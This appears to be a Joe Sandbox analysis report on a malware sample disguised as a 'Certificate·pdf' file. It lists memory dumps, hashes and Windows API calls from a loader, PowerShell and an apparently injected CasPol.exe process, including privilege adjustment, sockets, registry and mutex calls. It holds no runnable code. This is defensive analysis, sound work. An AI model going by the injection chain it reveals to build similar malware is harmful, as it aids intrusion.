Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3370423016
Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
Instruction ID: d1e11866c06308db2688671cfe2e39cf8e5f3b64411c1caee3e249c785e2e979
Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
Instruction Fuzzy Hash: BDD05EB34109209AC3126B08DC00D9F77BCEF11301746486AF440A6161D7786C8186AD

Function 00405CF2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D02
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D1A
CharNextA.USER32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D2B
lstrlenA.KERNEL32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D34

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
Instruction ID: 076f441daad098c1e87a0755c7bbd60db18a276d6ce73f7d9d897af98e652dc6
Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
Instruction Fuzzy Hash: E5F0F631204918FFC7129FA4DD0499FBBB8EF06354B2580BAE840FB211D674DE01AFA8

Analysis Process: powershell.exePID: 5828, Parent PID: 5620COMMON

Executed Functions

Function 0323D006 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24014127216.000000000323D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0323D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_323d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e19ba056c2e4ffa23c76449015d1b7f4437aad72d9100d363602482136f8c3e9
Instruction ID: 7d85b6c97b8fed02074d4e8284e7e8e0ca5c23bc3e1ba85993087d1ebb4ae3da
Opcode Fuzzy Hash: e19ba056c2e4ffa23c76449015d1b7f4437aad72d9100d363602482136f8c3e9
Instruction Fuzzy Hash: 320121624493C05FD7128B25CC94792BFA8EF53720F1984D7D8948F197C2685885C771

Function 0323D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24014127216.000000000323D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0323D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_323d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 781be46b46a5e52eb5b793655516fff665c01bfb2ccff5b313cdc72b3112b5e7
Instruction ID: f0d96b19613b0d22c351e34e1147c360b482255d6c68a8c46fd87b0532adf7a4
Opcode Fuzzy Hash: 781be46b46a5e52eb5b793655516fff665c01bfb2ccff5b313cdc72b3112b5e7
Instruction Fuzzy Hash: 2701F7B15143409BE7108A65CCC4BA3FF9CDF42764F18C05AEC540B242C2799585CAB1

Non-executed Functions

Function 0323D7E4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24014127216.000000000323D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0323D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_323d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e33340489b467ea2351d9214d2ab9080651b52ea95ed4f69e0c1dbbce1c0fa84
Instruction ID: c00abad5db4bb46ef8d17f047bdf0b95125c42e40136f11adc05a01ffe4ad3fc
Opcode Fuzzy Hash: e33340489b467ea2351d9214d2ab9080651b52ea95ed4f69e0c1dbbce1c0fa84
Instruction Fuzzy Hash: B82125B1514340EFDB05DF14E8C0B26BB66FB85324F24C5A9E8090B266C336E496CBA2

Analysis Process: CasPol.exePID: 1072, Parent PID: 5828COMMON

Execution Graph

Execution Coverage:	16.1%
Dynamic/Decrypted Code Coverage:	84.7%
Signature Coverage:	0%
Total number of Nodes:	183
Total number of Limit Nodes:	10

Executed Functions

Function 23D62EAB Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 23D62F2B

Memory Dump Source

Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: eef5e3a213a5c1b5d7b04ba894820e9efdf493e1ae24c85cfe4e7eb50b16c74d
Instruction ID: 5750275be4c5c2bf9c0b75f39608d9375db2fa344440172d02e3ec5d05314341
Opcode Fuzzy Hash: eef5e3a213a5c1b5d7b04ba894820e9efdf493e1ae24c85cfe4e7eb50b16c74d
Instruction Fuzzy Hash: 8121B076509780AFDB128F25DC44B52BFB8EF06710F0C84DAE9858F163D275E908DB62

Function 23D62EE2 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 23D62F2B

Memory Dump Source

Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 10cde86178e59f1a6e2cc589f38fac229e392b168dea9428a5be6b055926c824
Instruction ID: ea07be081f69523704cc999b3737d4fae7b98d5b964e35c0877abd33590de9e2
Opcode Fuzzy Hash: 10cde86178e59f1a6e2cc589f38fac229e392b168dea9428a5be6b055926c824
Instruction Fuzzy Hash: 5D115E355002049FDB20CF56E984B56FBE8EF04620F08C4AEED958B652D375E458DF62

Function 23BD23A0 Relevance: .5, Instructions: 505COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18f62f1a4ee4d0b58752cbcd6bdfd9dc5d9bf5c5157b4d9557f79b25ed7b6fb4
Instruction ID: d96199bc8b218ca827268d810c2885ef16ec6355a585c15b3e8a79d9fc7ca53b
Opcode Fuzzy Hash: 18f62f1a4ee4d0b58752cbcd6bdfd9dc5d9bf5c5157b4d9557f79b25ed7b6fb4
Instruction Fuzzy Hash: 1612BB32E10299CFCB14EF68C5846AEB7F2FF88315F1885B9D8169B265DB789941CF40

Function 23BD86DD Relevance: .5, Instructions: 465COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa9831268a0201329960e4c2fa5f2a939bb90e1efb54d9313f7c5810767817fe
Instruction ID: 0ad21285ac18d84e9f08a1485c4f8cfcd160e2ccfe778e70e84db567982d0f82
Opcode Fuzzy Hash: fa9831268a0201329960e4c2fa5f2a939bb90e1efb54d9313f7c5810767817fe
Instruction Fuzzy Hash: F512BA32A04229CFDB04EF38C490669B7F2FF98706F6985BAD415DB2A5DB78D941CB40

Function 23BD2FA8 Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc10537c3fa40a8ef921bf86f54779790bb26369335c75231af1f2711277fcb4
Instruction ID: e973064051f95149390d4766cef7de1208de5feb42cb47e85083de741eec0d2c
Opcode Fuzzy Hash: fc10537c3fa40a8ef921bf86f54779790bb26369335c75231af1f2711277fcb4
Instruction Fuzzy Hash: EA818E32F011198BD704DF68D894A5EB7E7AFC8214F2984B9E409DB36ADE35DC018B91

Function 23D61BBB Relevance: 1.6, APIs: 1, Instructions: 95
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 23D61C76

Memory Dump Source

Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: bdf69e595a44ba401419baa1c8e7d16e9892321d7c7dc721bab3552743209555
Instruction ID: d0a1a0410996f158ef000aa2820a288769065b03069c5f571e332c9fefc741f0
Opcode Fuzzy Hash: bdf69e595a44ba401419baa1c8e7d16e9892321d7c7dc721bab3552743209555
Instruction Fuzzy Hash: B631AF714097C06FD7129F61DC58B56BFB4EF07210F0988DFE9858B2A3D265A409CB62

Function 23D6115B Relevance: 1.6, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempFileNameW.KERNEL32(?,00000EA8,?,?), ref: 23D6122A

Memory Dump Source

Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd

Similarity

API ID: FileNameTemp
String ID:
API String ID: 745986568-0
Opcode ID: 0f57d110bd9a83bf7fe31d1808688e56e313427fe329bab6287b4ba926a34e3c
Instruction ID: e3cb5ba94064d393d80f95c7745e2569d887c9e5623781b688dc9b2f75e7e9dc
Opcode Fuzzy Hash: 0f57d110bd9a83bf7fe31d1808688e56e313427fe329bab6287b4ba926a34e3c
Instruction Fuzzy Hash: 1E31786150E3C06FD3038B258C61B62BFB4AF47624F0E81DBD8849F5A3D6286919C7B2

Function 23D61330 Relevance: 1.6, APIs: 1, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,00000EA8), ref: 23D613CF

Memory Dump Source

Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 3eb58a089ce6366ef653c0795652ea4994a7a705be61fdf91403590a1adb337d
Instruction ID: d6ed2ce3774a1595723887d507c075ba601cfd91109e38ba0d1eaf6dc56b3ffe
Opcode Fuzzy Hash: 3eb58a089ce6366ef653c0795652ea4994a7a705be61fdf91403590a1adb337d
Instruction Fuzzy Hash: 5A31D476500344AFEB229F61DC45F67BBACEF05224F08889EF985CB152D324A519CB71

Function 23D604DC Relevance: 1.6, APIs: 1, Instructions: 93
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExA.KERNEL32(?,00000EA8), ref: 23D605AA

Memory Dump Source

Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 060c7e1675ee1caf8ee5ef1cc4fb60305d94fb154431d5fcf0321000496d9b05
Instruction ID: 9ae2d238c56be71b05ddb1689e296d5cf312cc18416ba879ed29fdc47f0598ea
Opcode Fuzzy Hash: 060c7e1675ee1caf8ee5ef1cc4fb60305d94fb154431d5fcf0321000496d9b05
Instruction Fuzzy Hash: 9531F575004384AFE722CF10DC44FA6FBB8EF06714F0844DEFA848B192D3A5A949CB61

Function 23D60882 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTokenInformation.KERNELBASE(?,00000EA8,9E0939A2,00000000,00000000,00000000,00000000), ref: 23D6092C

Memory Dump Source

Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 5c804b5417d2823673e176a0b00c84962571ca78bf39196d923ca2daa0a332a6
Instruction ID: 0e1524600c97f0ad939bfc2c9ddfe65a7ab933a6bd5027bc0688cea5210bde82
Opcode Fuzzy Hash: 5c804b5417d2823673e176a0b00c84962571ca78bf39196d923ca2daa0a332a6
Instruction Fuzzy Hash: 693195765097846FD712CF21DC44FA6BFB8EF46714F0884DBE984CB153D265A908CBA1

Function 23D62730 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32(?,00000EA8), ref: 23D627F7

Memory Dump Source

Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: 537aca5ed347cf9b5a0576f80777d44ae89c26caa02abec9d70c8d835b6291af
Instruction ID: 845c2024db9d2ebdcf34dc02735a85a3bef59a8160787dd12b65e50c2fae4a75
Opcode Fuzzy Hash: 537aca5ed347cf9b5a0576f80777d44ae89c26caa02abec9d70c8d835b6291af
Instruction Fuzzy Hash: BD31B476504344BFE721DB51DC88FA6FBACEF04714F04489AFA889B192D375A948CB71

Function 2180AAAA Relevance: 1.6, APIs: 1, Instructions: 92
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32(?,00000EA8), ref: 2180AB59

Memory Dump Source

Source File: 00000005.00000002.28396928330.000000002180A000.00000040.00000800.00020000.00000000.sdmp, Offset: 2180A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2180a000_CasPol.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 83ecbbb7c7ff285975d2f0d72d05b6520c9c2c5cde08709eac06bccce5b7147f
Instruction ID: dc1562fa795997891ed2bc31bc456de893fe97ffe3df826149094ec2385d3249
Opcode Fuzzy Hash: 83ecbbb7c7ff285975d2f0d72d05b6520c9c2c5cde08709eac06bccce5b7147f
Instruction Fuzzy Hash: 4F31C576544384AFE722DB11CC45FA7BFBCEF06310F08889AF9859B153D265A509CB72

Function 23D60EB4 Relevance: 1.6, APIs: 1, Instructions: 92
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 23D60F59

Memory Dump Source

Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 7d581a1df584cc3b39d05ed613ddb311ab96cf5d7d3ba52097bd64e675193d1e
Instruction ID: 382e179cb245ca2ba8b168889771c4363a2fae8f1bb737315952e19d6eb7b368
Opcode Fuzzy Hash: 7d581a1df584cc3b39d05ed613ddb311ab96cf5d7d3ba52097bd64e675193d1e
Instruction Fuzzy Hash: 9F319071505380AFE721CF25DC44F66BBE8EF05624F08849EE9858B252D365E419CB72

Function 2180ABA1 Relevance: 1.6, APIs: 1, Instructions: 89
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNEL32(?,00000EA8,9E0939A2,00000000,00000000,00000000,00000000), ref: 2180AC5C

Memory Dump Source

Source File: 00000005.00000002.28396928330.000000002180A000.00000040.00000800.00020000.00000000.sdmp, Offset: 2180A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2180a000_CasPol.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 4f89f4cc647fc73871902a44213f20e3613f2756ed0c8b377f29afefa0ecdb15
Instruction ID: de01e949cc6d840b9ce0a603614587b6cc2e7a35799100340f016015ab185e54
Opcode Fuzzy Hash: 4f89f4cc647fc73871902a44213f20e3613f2756ed0c8b377f29afefa0ecdb15
Instruction Fuzzy Hash: C231C476105384AFE722CF21CC84FA6BFF8EF06314F08849AE985CB153D264E948CB61

Function 23D60242 Relevance: 1.6, APIs: 1, Instructions: 89
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32(?,?), ref: 23D602E9

Memory Dump Source

Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 225a7734d75413fc575a352d94d283ee5381f5af76b50e4cc8d955b646bee7a2
Instruction ID: 5c0f604e7236fcfff55d9fd91f17640aa825b3cba230bf7315decca2a4a8928f
Opcode Fuzzy Hash: 225a7734d75413fc575a352d94d283ee5381f5af76b50e4cc8d955b646bee7a2
Instruction Fuzzy Hash: D631AD755093806FE712DB25DC85B96BFA8EF06314F08849AE984CB293D365A909CB62

Function 23D61F1E Relevance: 1.6, APIs: 1, Instructions: 87
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000EA8), ref: 23D61FBB

Memory Dump Source

Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: a4b86380d8589d2bccc92dad527ce12ce6a75bbaec9e4572ed3a21a611608fb3
Instruction ID: ca007925cedbf204aab2c745f860c70a82430e48b30b308bed5908929304607b
Opcode Fuzzy Hash: a4b86380d8589d2bccc92dad527ce12ce6a75bbaec9e4572ed3a21a611608fb3
Instruction Fuzzy Hash: 6B21D576504344AFE721DF65DC45F6BFFACEF45310F08849AE984DB152D364A908CB62

Function 23D605F7 Relevance: 1.6, APIs: 1, Instructions: 86
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNEL32(?,00000EA8,9E0939A2,00000000,00000000,00000000,00000000), ref: 23D606A8

Memory Dump Source

Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: e67d9b1e6e5b33dcc0413974a51bbc60bdbedf0059718dad2f47def2b5285433
Instruction ID: 3bfc98cf5d1dc0dcd5ec842c10ef1fb333426f1f7783632a41cbd8344aa8a930
Opcode Fuzzy Hash: e67d9b1e6e5b33dcc0413974a51bbc60bdbedf0059718dad2f47def2b5285433
Instruction Fuzzy Hash: C931B1751093806FD722DB61DC44F92BFB8EF06614F0C84DAE9859B1A3D364A908CB76

Function 23D62902 Relevance: 1.6, APIs: 1, Instructions: 86
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FormatMessageW.KERNEL32(?,00000EA8,?,?), ref: 23D629B2

Memory Dump Source

Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: 1842e40855b030048a1902b769b2df93e875ec59d24217dfc470a39bd822f45e
Instruction ID: eee76f8d800d8e1e698bb340458995d1025ce82f5f480f7dcf5df03a92e3313f
Opcode Fuzzy Hash: 1842e40855b030048a1902b769b2df93e875ec59d24217dfc470a39bd822f45e
Instruction Fuzzy Hash: 4D318F7650D3C45FD3038B618C65B66BFB4EF87610F0980CBD884CF2A3E6246919D7A2

Function 23D62752 Relevance: 1.6, APIs: 1, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32(?,00000EA8), ref: 23D627F7

Memory Dump Source

Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: 5235767d20e8e31f7b556d7c7b7d791ae41746d1a027894328e84112b9c2bfeb
Instruction ID: b41a39983ef8d8dc9c21fe3c77d7a97306b987ef8fe94014bd487461d8ee68c1
Opcode Fuzzy Hash: 5235767d20e8e31f7b556d7c7b7d791ae41746d1a027894328e84112b9c2bfeb
Instruction Fuzzy Hash: A421A375500204AFE730EB51DC85FB6F7ACEF04714F04889AFA889A281D775A548CBB1

Function 23D61352 Relevance: 1.6, APIs: 1, Instructions: 80
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,00000EA8), ref: 23D613CF

Memory Dump Source

Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 7001de3c447a4439a70b43d9c8051c0c1f039ef07bb47d91daf7529665338f41
Instruction ID: c36c00af2534eaa8f12bc7e07a929f7ff4e6aeb2769cd1b4eb32f62f6020642a
Opcode Fuzzy Hash: 7001de3c447a4439a70b43d9c8051c0c1f039ef07bb47d91daf7529665338f41
Instruction Fuzzy Hash: 0221C176500304AFEB21AF61DC45F6AFBACEF04224F04886AE985CB651D774A549CBA2

Function 23D603F7 Relevance: 1.6, APIs: 1, Instructions: 79registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(?,00000EA8), ref: 23D6049F

Memory Dump Source

Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 166fb0d04d4836f11e1e2ee735598ecda25d52ff22692b1076d45b722213a1ef
Instruction ID: d3f0d36da822bb28d8a41184797bcaa9948686b1441f6a15b14d77af50a348d4
Opcode Fuzzy Hash: 166fb0d04d4836f11e1e2ee735598ecda25d52ff22692b1076d45b722213a1ef
Instruction Fuzzy Hash: 0F21D8750093806FE7228F11DC45FA6FFB4EF06310F0884CAF9844B192D3656909CB72

Function 2180AFF8 Relevance: 1.6, APIs: 1, Instructions: 77COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?,00000EA8,?,?), ref: 2180B092

Memory Dump Source

Source File: 00000005.00000002.28396928330.000000002180A000.00000040.00000800.00020000.00000000.sdmp, Offset: 2180A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2180a000_CasPol.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: e0a654faab905d55134bcc4fd46352e25997058c85f889cb5aa422e97e5bac6d
Instruction ID: 741f5ac21b63fa1c7db94459fcaa107adadcdacaf50c0858f3c08a1d57d59e75
Opcode Fuzzy Hash: e0a654faab905d55134bcc4fd46352e25997058c85f889cb5aa422e97e5bac6d
Instruction Fuzzy Hash: 9421C2715093C06FD3138B259C51B62BFB4EF87610F0A81DBE884DB693D225A919C7B2

Function 23D620DA Relevance: 1.6, APIs: 1, Instructions: 77fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNEL32 ref: 23D6216E

Memory Dump Source

Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 1f2add0a364c14c8372ded7de4bb3bcdfe86b2fb0af885f8ef22c598a30c7ffe
Instruction ID: 86502e83febf279bfd7c7cdc484558fb0870342d00e24b37aaed0b45cbeb0da5
Opcode Fuzzy Hash: 1f2add0a364c14c8372ded7de4bb3bcdfe86b2fb0af885f8ef22c598a30c7ffe
Instruction Fuzzy Hash: 3621B171405380AFE722CF15DC48F56FBF8EF09224F08849EE9858B252D365B508CB62

Function 23D60EDA Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 23D60F59

Memory Dump Source

Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 18bb91922ddc9bcdccd46b742902750af54aa31e0c12ad9464b21d7581721054
Instruction ID: 19dd45ac73307106580de216e9667cf645a0fc239064080eb12d66feed4dbd0f
Opcode Fuzzy Hash: 18bb91922ddc9bcdccd46b742902750af54aa31e0c12ad9464b21d7581721054
Instruction Fuzzy Hash: D621AE75504200AFEB20DF26DD84F66FBECEF08724F4884ADE9858B252D375E414CB62

Function 23D61F4A Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000EA8), ref: 23D61FBB

Memory Dump Source

Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: 123a57a37f678d2c7d7c7f16190c999f45b714c39e5dbf3951844f581e349b8b
Instruction ID: b4afbc43a0298ff8c071f681ff59d9bf1f043cb6397f8483dace76c88abf0fd7
Opcode Fuzzy Hash: 123a57a37f678d2c7d7c7f16190c999f45b714c39e5dbf3951844f581e349b8b
Instruction Fuzzy Hash: 3C21A476500204AFE720EF25DC45F6AFBACEF04714F08846AE984DB252D764E519CF66

